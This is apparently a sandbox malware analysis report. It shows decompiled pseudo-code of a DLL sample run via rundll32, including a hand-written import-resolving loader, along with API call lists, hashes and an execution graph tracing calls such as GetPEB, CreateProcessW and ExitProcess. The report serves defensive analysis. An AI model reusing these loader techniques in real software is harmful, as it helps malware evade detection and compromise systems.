                                                                                                                                                                            				_v12 =  *_a4 + 0x80;
                                                                                                                                                                            				if( *((intOrPtr*)(_v12 + 4)) != 0) {
                                                                                                                                                                            					_v8 = _v20 +  *_v12;
                                                                                                                                                                            					while(IsBadReadPtr(_v8, 0x14) == 0 &&  *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                            						_t114 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c))))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                            						_t203 = _t202 + 8;
                                                                                                                                                                            						_v36 = _t114;
                                                                                                                                                                            						if(_v36 != 0) {
                                                                                                                                                                            							_t116 = E10001F00( *((intOrPtr*)(_a4 + 8)), 4 +  *(_a4 + 0xc) * 4);
                                                                                                                                                                            							_t202 = _t203 + 8;
                                                                                                                                                                            							_v28 = _t116;
                                                                                                                                                                            							if(_v28 != 0) {
                                                                                                                                                                            								 *((intOrPtr*)(_a4 + 8)) = _v28;
                                                                                                                                                                            								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) +  *(_a4 + 0xc) * 4)) = _v36;
                                                                                                                                                                            								 *(_a4 + 0xc) =  *(_a4 + 0xc) + 1;
                                                                                                                                                                            								if( *_v8 == 0) {
                                                                                                                                                                            									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                            									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_v32 = _v20 +  *_v8;
                                                                                                                                                                            									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
                                                                                                                                                                            								}
                                                                                                                                                                            								while( *_v32 != 0) {
                                                                                                                                                                            									if(( *_v32 & 0x80000000) == 0) {
                                                                                                                                                                            										_v40 = _v20 +  *_v32;
                                                                                                                                                                            										_t133 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36, _v40 + 2,  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                            										_t202 = _t202 + 0xc;
                                                                                                                                                                            										 *_v24 = _t133;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_t138 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36,  *_v32 & 0x0000ffff,  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                            										_t202 = _t202 + 0xc;
                                                                                                                                                                            										 *_v24 = _t138;
                                                                                                                                                                            									}
                                                                                                                                                                            									if( *_v24 != 0) {
                                                                                                                                                                            										_v32 =  &(_v32[1]);
                                                                                                                                                                            										_v24 = _v24 + 4;
                                                                                                                                                                            										continue;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_v16 = 0;
                                                                                                                                                                            										break;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								if(_v16 != 0) {
                                                                                                                                                                            									_v8 = _v8 + 0x14;
                                                                                                                                                                            									continue;
                                                                                                                                                                            								}
                                                                                                                                                                            								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                            								SetLastError(0x7f);
                                                                                                                                                                            								break;
                                                                                                                                                                            							}
                                                                                                                                                                            							 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                            							SetLastError(0xe);
                                                                                                                                                                            							_v16 = 0;
                                                                                                                                                                            							break;
                                                                                                                                                                            						}
                                                                                                                                                                            						SetLastError(0x7e);
                                                                                                                                                                            						_v16 = 0;
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					return _v16;
                                                                                                                                                                            				}
                                                                                                                                                                            				return 1;
                                                                                                                                                                            			}



















                                                                                                                                                                            0x10002676
                                                                                                                                                                            0x1000267f
                                                                                                                                                                            0x10002682
                                                                                                                                                                            0x10002693
                                                                                                                                                                            0x1000269d
                                                                                                                                                                            0x100026b1
                                                                                                                                                                            0x100026bf
                                                                                                                                                                            0x100026f7
                                                                                                                                                                            0x100026f9
                                                                                                                                                                            0x100026fc
                                                                                                                                                                            0x10002703
                                                                                                                                                                            0x1000272e
                                                                                                                                                                            0x10002733
                                                                                                                                                                            0x10002736
                                                                                                                                                                            0x1000273d
                                                                                                                                                                            0x1000276f
                                                                                                                                                                            0x10002781
                                                                                                                                                                            0x10002790
                                                                                                                                                                            0x10002799
                                                                                                                                                                            0x100027bd
                                                                                                                                                                            0x100027c9
                                                                                                                                                                            0x1000279b
                                                                                                                                                                            0x100027a3
                                                                                                                                                                            0x100027af
                                                                                                                                                                            0x100027af
                                                                                                                                                                            0x100027e0
                                                                                                                                                                            0x100027f3
                                                                                                                                                                            0x10002825
                                                                                                                                                                            0x10002840
                                                                                                                                                                            0x10002842
                                                                                                                                                                            0x10002848
                                                                                                                                                                            0x100027f5
                                                                                                                                                                            0x10002811
                                                                                                                                                                            0x10002813
                                                                                                                                                                            0x10002819
                                                                                                                                                                            0x10002819
                                                                                                                                                                            0x10002850
                                                                                                                                                                            0x100027d4
                                                                                                                                                                            0x100027dd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002852
                                                                                                                                                                            0x10002852
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002852
                                                                                                                                                                            0x10002850
                                                                                                                                                                            0x10002864
                                                                                                                                                                            0x100026bc
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100026bc
                                                                                                                                                                            0x10002877
                                                                                                                                                                            0x1000287e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000287e
                                                                                                                                                                            0x10002750
                                                                                                                                                                            0x10002757
                                                                                                                                                                            0x1000275d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000275d
                                                                                                                                                                            0x10002707
                                                                                                                                                                            0x1000270d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000270d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000288b
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,10002C4E,00000000,00000000), ref: 100026C5
                                                                                                                                                                            • SetLastError.KERNEL32(0000007E), ref: 10002707
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorLastRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4100373531-0
                                                                                                                                                                            • Opcode ID: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
                                                                                                                                                                            • Instruction ID: 5b18a635dcf056017fd1ee77a603d3a0bb8baed770e763f1765233b10108ec1d
                                                                                                                                                                            • Opcode Fuzzy Hash: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
                                                                                                                                                                            • Instruction Fuzzy Hash: 7381BAB4A05209DFDB04CF94C880A9EB7B1FF88354F248159E819AB355D735EE82CF94
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                            			E1001431B(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				struct _CRITICAL_SECTION* _t4;
                                                                                                                                                                            				void* _t7;
                                                                                                                                                                            				void* _t10;
                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                            				void* _t14;
                                                                                                                                                                            				intOrPtr* _t15;
                                                                                                                                                                            				void* _t17;
                                                                                                                                                                            
                                                                                                                                                                            				_t17 = __ebp;
                                                                                                                                                                            				_t14 = __esi;
                                                                                                                                                                            				_t7 = __ebx;
                                                                                                                                                                            				_t11 = _a4;
                                                                                                                                                                            				_t20 = _t11 - 0x11;
                                                                                                                                                                            				if(_t11 >= 0x11) {
                                                                                                                                                                            					_t4 = E1000A0DB(__ebx, _t10, _t11, __esi, _t20);
                                                                                                                                                                            				}
                                                                                                                                                                            				if( *0x1005aac0 == 0) {
                                                                                                                                                                            					_t4 = E100142F7();
                                                                                                                                                                            				}
                                                                                                                                                                            				_push(_t7);
                                                                                                                                                                            				_push(_t17);
                                                                                                                                                                            				_push(_t14);
                                                                                                                                                                            				_t15 = 0x1005ac78 + _t11 * 4;
                                                                                                                                                                            				if( *_t15 == 0) {
                                                                                                                                                                            					EnterCriticalSection(0x1005ac60);
                                                                                                                                                                            					if( *_t15 == 0) {
                                                                                                                                                                            						_t4 = 0x1005aac8 + _t11 * 0x18;
                                                                                                                                                                            						InitializeCriticalSection(_t4);
                                                                                                                                                                            						 *_t15 =  *_t15 + 1;
                                                                                                                                                                            					}
                                                                                                                                                                            					LeaveCriticalSection(0x1005ac60);
                                                                                                                                                                            				}
                                                                                                                                                                            				EnterCriticalSection(0x1005aac8 + _t11 * 0x18);
                                                                                                                                                                            				return _t4;
                                                                                                                                                                            			}











                                                                                                                                                                            0x1001431b
                                                                                                                                                                            0x1001431b
                                                                                                                                                                            0x1001431b
                                                                                                                                                                            0x1001431c
                                                                                                                                                                            0x10014320
                                                                                                                                                                            0x10014323
                                                                                                                                                                            0x10014325
                                                                                                                                                                            0x10014325
                                                                                                                                                                            0x10014331
                                                                                                                                                                            0x10014333
                                                                                                                                                                            0x10014333
                                                                                                                                                                            0x10014338
                                                                                                                                                                            0x1001433f
                                                                                                                                                                            0x10014340
                                                                                                                                                                            0x10014341
                                                                                                                                                                            0x10014350
                                                                                                                                                                            0x10014357
                                                                                                                                                                            0x1001435c
                                                                                                                                                                            0x10014363
                                                                                                                                                                            0x10014366
                                                                                                                                                                            0x1001436c
                                                                                                                                                                            0x1001436c
                                                                                                                                                                            0x10014373
                                                                                                                                                                            0x10014373
                                                                                                                                                                            0x1001437f
                                                                                                                                                                            0x10014385

                                                                                                                                                                            APIs
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
                                                                                                                                                                            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F
                                                                                                                                                                              • Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
                                                                                                                                                                              • Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2895727460-0
                                                                                                                                                                            • Opcode ID: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
                                                                                                                                                                            • Instruction ID: b2ae72b8ab0fae698251e24a42d2174316ff56aad592cf34d272a36c1b8e20b9
                                                                                                                                                                            • Opcode Fuzzy Hash: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
                                                                                                                                                                            • Instruction Fuzzy Hash: 05F090739002169BE700DF59CC89A1ABBA9FBC32A5F93011AF14096121DB3199C5CA61
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E1001398E(long* __ecx, signed int _a4) {
                                                                                                                                                                            				void* _t9;
                                                                                                                                                                            				struct _CRITICAL_SECTION* _t12;
                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                            				long* _t16;
                                                                                                                                                                            
                                                                                                                                                                            				_t16 = __ecx;
                                                                                                                                                                            				_t1 =  &(_t16[7]); // 0x1005aaa8
                                                                                                                                                                            				_t12 = _t1;
                                                                                                                                                                            				EnterCriticalSection(_t12);
                                                                                                                                                                            				_t14 = _a4;
                                                                                                                                                                            				if(_t14 <= 0) {
                                                                                                                                                                            					L5:
                                                                                                                                                                            					LeaveCriticalSection(_t12);
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t3 =  &(_t16[3]); // 0x3
                                                                                                                                                                            				if(_t14 >=  *_t3) {
                                                                                                                                                                            					goto L5;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t9 = TlsGetValue( *_t16);
                                                                                                                                                                            				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
                                                                                                                                                                            					goto L5;
                                                                                                                                                                            				} else {
                                                                                                                                                                            					LeaveCriticalSection(_t12);
                                                                                                                                                                            					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
                                                                                                                                                                            				}
                                                                                                                                                                            			}







                                                                                                                                                                            0x10013990
                                                                                                                                                                            0x10013993
                                                                                                                                                                            0x10013993
                                                                                                                                                                            0x10013997
                                                                                                                                                                            0x1001399d
                                                                                                                                                                            0x100139a3
                                                                                                                                                                            0x100139cc
                                                                                                                                                                            0x100139cd
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100139d3
                                                                                                                                                                            0x100139a5
                                                                                                                                                                            0x100139a8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100139ac
                                                                                                                                                                            0x100139b4
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100139bb
                                                                                                                                                                            0x100139c2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100139c8

                                                                                                                                                                            APIs
                                                                                                                                                                            • EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013997
                                                                                                                                                                            • TlsGetValue.KERNEL32(1005AA8C,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139AC
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139C2
                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139CD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CriticalSection$Leave$EnterValue
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3969253408-0
                                                                                                                                                                            • Opcode ID: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
                                                                                                                                                                            • Instruction ID: ae8276b6876f5357c50f650584214137971e28de593e3cdb7c29343fae997712
                                                                                                                                                                            • Opcode Fuzzy Hash: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
                                                                                                                                                                            • Instruction Fuzzy Hash: 27F012762006529FD710DF65CC8C90B77EDEF84291327D856E84697152D770F856CF50
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:18.7%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                            Total number of Nodes:1077
                                                                                                                                                                            Total number of Limit Nodes:15

                                                                                                                                                                            Graph

                                                                                                                                                                            execution_graph 3903 c36395 3904 c36453 3903->3904 3905 c3647e 3903->3905 3909 c3efdd 3904->3909 3919 c3f548 3909->3919 3912 c3f760 3948 c385ff 3912->3948 3913 c36466 3913->3905 3922 c3d11a 3913->3922 3916 c3e1f8 GetPEB RtlAllocateHeap 3916->3919 3919->3912 3919->3913 3919->3916 3921 c3fecb GetPEB 3919->3921 3925 c4061d 3919->3925 3929 c21a34 3919->3929 3933 c40db1 3919->3933 3937 c42d0a 3919->3937 3941 c3fe2a 3919->3941 3945 c2c307 3919->3945 3921->3919 3923 c2eb52 GetPEB 3922->3923 3924 c3d1b1 ExitProcess 3923->3924 3924->3905 3926 c40636 3925->3926 3958 c2eb52 3926->3958 3930 c21a59 3929->3930 3931 c2eb52 GetPEB 3930->3931 3932 c21aeb 3931->3932 3932->3919 3934 c40dcc 3933->3934 3988 c3bb96 3934->3988 3938 c42d2f 3937->3938 3992 c431aa 3938->3992 3942 c3fe3d 3941->3942 3995 c2c28c 3942->3995 3946 c2eb52 GetPEB 3945->3946 3947 c2c39e 3946->3947 3947->3919 3949 c38626 3948->3949 3950 c3fe2a GetPEB 3949->3950 3951 c3878e 3950->3951 4003 c42c24 3951->4003 3953 c387c7 3957 c387d2 3953->3957 4007 c41538 3953->4007 3955 c387ec 3956 c41538 2 API calls 3955->3956 3956->3957 3957->3913 3959 c2ebf7 3958->3959 3960 c2ec1b lstrcmpiW 3958->3960 3964 c3567b 3959->3964 3960->3919 3962 c2ec06 3967 c2ec31 3962->3967 3971 c2f7f7 GetPEB 3964->3971 3966 c3573b 3966->3962 3968 c2ec50 3967->3968 3969 c2ed2e 3968->3969 3972 c27e79 3968->3972 3969->3960 3971->3966 3973 c27fa7 3972->3973 3980 c2801a 3973->3980 3976 c27fe4 3978 c2ec31 GetPEB 3976->3978 3979 c28011 3976->3979 3978->3979 3979->3969 3981 c2802d 3980->3981 3982 c2eb52 GetPEB 3981->3982 3983 c27fcb 3982->3983 3983->3976 3984 c2483c 3983->3984 3985 c2484c 3984->3985 3986 c2eb52 GetPEB 3985->3986 3987 c248d1 3986->3987 3987->3976 3989 c3bbbe 3988->3989 3990 c2eb52 GetPEB 3989->3990 3991 c3bc5c 3990->3991 3991->3919 3993 c2eb52 GetPEB 3992->3993 3994 c42d4b 3993->3994 3994->3919 3996 c2c2a9 3995->3996 3999 c276e0 3996->3999 4000 c276f8 3999->4000 4001 c2eb52 GetPEB 4000->4001 4002 c27793 4001->4002 4002->3919 4004 c42c57 4003->4004 4005 c2eb52 GetPEB 4004->4005 4006 c42ced CreateProcessW 4005->4006 4006->3953 4008 c41548 4007->4008 4009 c2eb52 GetPEB 4008->4009 4010 c4160f FindCloseChangeNotification 4009->4010 4010->3955 5163 c3a2a5 5164 c3a419 5163->5164 5165 c34244 2 API calls 5164->5165 5170 c3a467 5164->5170 5166 c3a434 5165->5166 5171 c43560 5166->5171 5169 c3fecb GetPEB 5169->5170 5172 c4357f 5171->5172 5173 c3a44b 5172->5173 5175 c3bddd 5172->5175 5173->5169 5176 c3bdf6 5175->5176 5177 c2eb52 GetPEB 5176->5177 5178 c3be7e 5177->5178 5178->5172 4011 c2f1cb 4016 c28636 4011->4016 4013 c2f26d 4014 c3d11a 2 API calls 4013->4014 4015 c2f281 4014->4015 4051 c29ad5 4016->4051 4017 c2a3e5 4266 c327f9 4017->4266 4019 c2a3c5 4019->4013 4027 c2a3c7 4153 c417bd 4027->4153 4030 c33d85 GetPEB RtlAllocateHeap 4030->4051 4043 c40e63 GetPEB RtlAllocateHeap 4043->4051 4046 c42b09 GetPEB 4046->4051 4050 c3fecb GetPEB 4050->4051 4051->4017 4051->4019 4051->4027 4051->4030 4051->4043 4051->4046 4051->4050 4053 c32142 4051->4053 4067 c2670b 4051->4067 4075 c42699 4051->4075 4079 c2de74 4051->4079 4089 c3e955 4051->4089 4100 c42009 4051->4100 4111 c2d14c 4051->4111 4124 c34a66 4051->4124 4134 c3ad08 4051->4134 4144 c2a445 4051->4144 4163 c41028 4051->4163 4167 c34f74 4051->4167 4175 c277a3 4051->4175 4180 c230e7 4051->4180 4185 c3bd13 4051->4185 4189 c3d1bc 4051->4189 4199 c2bdf9 4051->4199 4202 c33eaa 4051->4202 4208 c24b5d 4051->4208 4211 c2c6b8 4051->4211 4224 c3c5d5 4051->4224 4228 c3fbde 4051->4228 4233 c3c387 4051->4233 4238 c3e4e5 4051->4238 4250 c39a01 4051->4250 4259 c38d3d 4051->4259 4056 c32628 4053->4056 4055 c2c5d8 GetPEB RtlAllocateHeap 4055->4056 4056->4055 4057 c327af 4056->4057 4060 c32793 4056->4060 4064 c32791 4056->4064 4280 c3e1f8 4056->4280 4284 c2738a 4056->4284 4288 c38b9e 4056->4288 4292 c3fecb 4056->4292 4300 c42b09 4057->4300 4296 c2f7fe 4060->4296 4064->4051 4065 c42b09 GetPEB 4065->4064 4071 c26a16 4067->4071 4069 c40db1 GetPEB 4069->4071 4071->4069 4073 c41538 2 API calls 4071->4073 4074 c26b43 4071->4074 4322 c445ca 4071->4322 4326 c3dbc1 4071->4326 4330 c3ca1f 4071->4330 4073->4071 4074->4051 4076 c426b3 4075->4076 4077 c3ff58 LoadLibraryW GetPEB RtlAllocateHeap 4076->4077 4078 c427a6 4076->4078 4077->4076 4078->4051 4082 c2e069 4079->4082 4080 c2e1e6 4349 c254b6 4080->4349 4082->4080 4084 c42b09 GetPEB 4082->4084 4085 c2e1e4 4082->4085 4088 c2c307 GetPEB 4082->4088 4334 c38c7d 4082->4334 4338 c3e0f2 4082->4338 4342 c3f840 4082->4342 4084->4082 4085->4051 4088->4082 4095 c3edaa 4089->4095 4090 c445ca 2 API calls 4090->4095 4091 c3efc1 4092 c41538 2 API calls 4091->4092 4093 c3efbf 4092->4093 4093->4051 4094 c3e1f8 2 API calls 4094->4095 4095->4090 4095->4091 4095->4093 4095->4094 4096 c42d0a GetPEB 4095->4096 4098 c3ca1f GetPEB 4095->4098 4099 c3fecb GetPEB 4095->4099 4357 c444ff 4095->4357 4096->4095 4098->4095 4099->4095 4361 c2556b 4100->4361 4102 c42465 4103 c425bf 4102->4103 4105 c3e1f8 GetPEB RtlAllocateHeap 4102->4105 4106 c425bd 4102->4106 4107 c42d0a GetPEB 4102->4107 4108 c3fecb GetPEB 4102->4108 4378 c2dc1b 4102->4378 4381 c444ad 4102->4381 4364 c3654a 4103->4364 4105->4102 4106->4051 4107->4102 4108->4102 4118 c2d807 4111->4118 4112 c2da79 4114 c23046 GetPEB 4112->4114 4113 c21a34 GetPEB 4113->4118 4115 c2da77 4114->4115 4115->4051 4118->4112 4118->4113 4118->4115 4119 c3e1f8 2 API calls 4118->4119 4123 c3fecb GetPEB 4118->4123 4393 c3b257 4118->4393 4406 c23046 4118->4406 4410 c37c4e 4118->4410 4414 c2f96f 4118->4414 4418 c3e8b6 4118->4418 4119->4118 4123->4118 4127 c34ded 4124->4127 4125 c21a34 GetPEB 4125->4127 4126 c23046 GetPEB 4126->4127 4127->4125 4127->4126 4128 c2c5d8 2 API calls 4127->4128 4129 c34f25 4127->4129 4132 c3e8b6 2 API calls 4127->4132 4133 c34f23 4127->4133 4438 c307f4 4127->4438 4128->4127 4131 c40db1 GetPEB 4129->4131 4131->4133 4132->4127 4133->4051 4139 c3b06a 4134->4139 4135 c40db1 GetPEB 4135->4139 4136 c3e1f8 2 API calls 4136->4139 4137 c3b173 4449 c37a0f 4137->4449 4138 c3654a GetPEB 4138->4139 4139->4135 4139->4136 4139->4137 4139->4138 4140 c42d0a GetPEB 4139->4140 4141 c3b171 4139->4141 4143 c3fecb GetPEB 4139->4143 4140->4139 4141->4051 4143->4139 4152 c2a713 4144->4152 4146 c2a84e 4148 c23046 GetPEB 4146->4148 4147 c2ee62 2 API calls 4147->4152 4150 c2a84c 4148->4150 4149 c3e8b6 2 API calls 4149->4152 4150->4051 4151 c23046 GetPEB 4151->4152 4152->4146 4152->4147 4152->4149 4152->4150 4152->4151 4467 c21e9b 4152->4467 4154 c417de 4153->4154 4155 c41f31 4154->4155 4157 c21a34 GetPEB 4154->4157 4158 c41f2f 4154->4158 4159 c3e1f8 GetPEB RtlAllocateHeap 4154->4159 4161 c2f96f GetPEB 4154->4161 4162 c3fecb GetPEB 4154->4162 4471 c2bf5f 4154->4471 4156 c385ff 3 API calls 4155->4156 4156->4158 4157->4154 4158->4019 4159->4154 4161->4154 4162->4154 4164 c41041 4163->4164 4165 c2eb52 GetPEB 4164->4165 4166 c410cd 4165->4166 4166->4051 4169 c3522f 4167->4169 4171 c35328 4169->4171 4172 c3e1f8 2 API calls 4169->4172 4173 c42d0a GetPEB 4169->4173 4174 c3fecb GetPEB 4169->4174 4475 c309dd 4169->4475 4479 c3437a 4169->4479 4171->4051 4172->4169 4173->4169 4174->4169 4178 c277cc 4175->4178 4176 c27e67 4176->4051 4177 c2c5d8 2 API calls 4177->4178 4178->4176 4178->4177 4179 c3cad5 GetPEB 4178->4179 4179->4178 4184 c231a7 4180->4184 4182 c2325b 4182->4051 4184->4182 4503 c4161b 4184->4503 4507 c42a36 4184->4507 4186 c3bd2c 4185->4186 4187 c2eb52 GetPEB 4186->4187 4188 c3bdd2 4187->4188 4188->4051 4198 c3d202 4189->4198 4190 c3fe2a GetPEB 4190->4198 4192 c42b09 GetPEB 4192->4198 4196 c3d8c2 4196->4051 4198->4190 4198->4192 4198->4196 4511 c26b7a 4198->4511 4519 c35779 4198->4519 4531 c280c0 4198->4531 4541 c32e5d 4198->4541 4559 c367e6 4198->4559 4200 c2c5d8 2 API calls 4199->4200 4201 c2be8c 4200->4201 4201->4051 4205 c34051 4202->4205 4203 c3416b 4203->4051 4204 c309dd GetPEB 4204->4205 4205->4203 4205->4204 4711 c2dd35 4205->4711 4714 c30aba 4205->4714 4209 c41028 GetPEB 4208->4209 4210 c24bf5 4209->4210 4210->4051 4219 c2cdac 4211->4219 4212 c3e1f8 GetPEB RtlAllocateHeap 4212->4219 4213 c300c5 GetPEB 4213->4219 4215 c2f96f GetPEB 4215->4219 4217 c2cdf0 4752 c253d0 4217->4752 4218 c21a34 GetPEB 4218->4219 4219->4212 4219->4213 4219->4215 4219->4217 4219->4218 4220 c2d05c 4219->4220 4222 c3fecb GetPEB 4219->4222 4756 c32cd9 4219->4756 4760 c22dea 4219->4760 4220->4220 4222->4219 4226 c3c7d3 4224->4226 4225 c2dc1b GetPEB 4225->4226 4226->4225 4227 c3c8ad 4226->4227 4227->4051 4229 c3fcf5 4228->4229 4231 c2c5d8 2 API calls 4229->4231 4232 c3fd44 4229->4232 4764 c39df5 4229->4764 4231->4229 4232->4051 4234 c2556b GetPEB 4233->4234 4235 c3c401 4234->4235 4793 c3b19c 4235->4793 4239 c3e50b 4238->4239 4242 c2c5d8 2 API calls 4239->4242 4246 c3e8a9 4239->4246 4797 c37d5b 4239->4797 4817 c400ef 4239->4817 4829 c2b820 4239->4829 4836 c2a871 4239->4836 4857 c3ccd9 4239->4857 4866 c2238c 4239->4866 4887 c3a474 4239->4887 4907 c42d53 4239->4907 